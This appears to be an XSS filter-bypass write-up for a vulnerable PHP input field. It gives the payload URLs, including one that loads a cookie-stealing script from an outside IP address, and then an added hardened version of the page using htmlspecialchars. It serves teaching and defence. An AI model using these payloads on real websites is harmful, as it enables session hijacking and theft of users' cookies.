First, a look at roughly how the program is written:
<?php
header("X-XSS-Protection:0");
$out = $_GET['code'];
// Blacklist filtering: angle brackets are entity-encoded, parentheses and
// single quotes are replaced by spaces. The double quote is never touched.
$out = str_replace("<","&lt;",$out);
$out = str_replace(">","&gt;",$out);
$out = str_replace("("," ",$out);
$out = str_replace(")"," ",$out);
$out = str_replace("'"," ",$out);
echo "<html>
<body>
<input value=\"$out\">
</body>
</html>";
?>
The angle brackets are encoded first, so the input tag cannot be closed; note, however, that the double quote is not filtered here, so the value attribute itself can be broken out of.
http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=alert(1) x="
The resulting page source is:
<input value="1" autofocus onfocus=alert 1 x="">
Because parentheses are filtered, alert cannot be called directly. One option is to assign a javascript: URL to location with the parentheses URL-encoded: the browser percent-decodes that URL before running it, so the parentheses never appear in the filtered input. (The URL below double-encodes them as %2528/%2529 because PHP already decodes the query string once when populating $_GET.)
http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location='javasCript:alert%25281%2529' x="
But single quotes are filtered here too, so we switch to double quotes:
http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location="javasCript:s=document.createElement%2528%2522script%2522%2529;s.src=%2522//120.92.84.50/myjs/cookie.js%2522;document.body.appendChild%2528s%2529;" x="
Alternatively, pass the payload in via this.name, modified as follows:
http://192.168.192.120:8080/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="
This successfully pops the alert; the same technique then loads an external JS file to grab the cookie.
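The root cause above is a blacklist that encodes some characters and blanks others but leaves the one character that matters in this context, the double quote, untouched. The following is an added example, not code from the original write-up, showing the same page rendered with context-aware output encoding instead of the str_replace() chain; it feeds the write-up's own payloads (as PHP sees them after query-string decoding) through the hardened renderer and checks that the attribute context is never escaped. The function name render_input and the payload list are constructed for this example.

```php
<?php
// Added example (not from the original write-up): the same input field, but
// output-encoded with htmlspecialchars() instead of the blacklist filter.
// The value lands inside a double-quoted attribute, so the double quote
// itself must be encoded; encoding <, >, ", ' and & leaves no way to break
// out of the attribute, which makes the location= and this.name tricks moot.

header('Content-Type: text/html; charset=UTF-8');

function render_input(string $code): string
{
    // ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE keeps invalid UTF-8 from
    // turning the whole value into an empty string; charset matches the header.
    $safe = htmlspecialchars($code, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<input value=\"{$safe}\">";
}

// Constructed check: the write-up's payloads after PHP has decoded the query
// string once (%2528 has already become %28 by the time $_GET is filled).
$payloads = [
    '1" autofocus onfocus=alert(1) x="',
    '1" autofocus onfocus=location=\'javasCript:alert%281%29\' x="',
    '1" name=javasCript:alert%281%29 autofocus onfocus=location=this.name x="',
];

foreach ($payloads as $p) {
    $html = render_input($p);
    // After encoding, the only raw double quotes left are the two that
    // delimit value="..."; any other would mean the attribute was escaped.
    if (substr_count($html, '"') !== 2) {
        throw new RuntimeException('attribute context escaped: ' . $html);
    }
    echo $html, PHP_EOL;
}
```

Each payload renders as inert text such as value="1&quot; autofocus onfocus=alert(1) x=&quot;", so autofocus and onfocus never become attributes. Note that the original page's header("X-XSS-Protection:0") only disabled a legacy browser heuristic; proper output encoding does not depend on it, and a Content-Security-Policy would additionally block the external script load even if another encoding gap existed.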
Reference article:
https://www.secpulse.com/archives/47696.html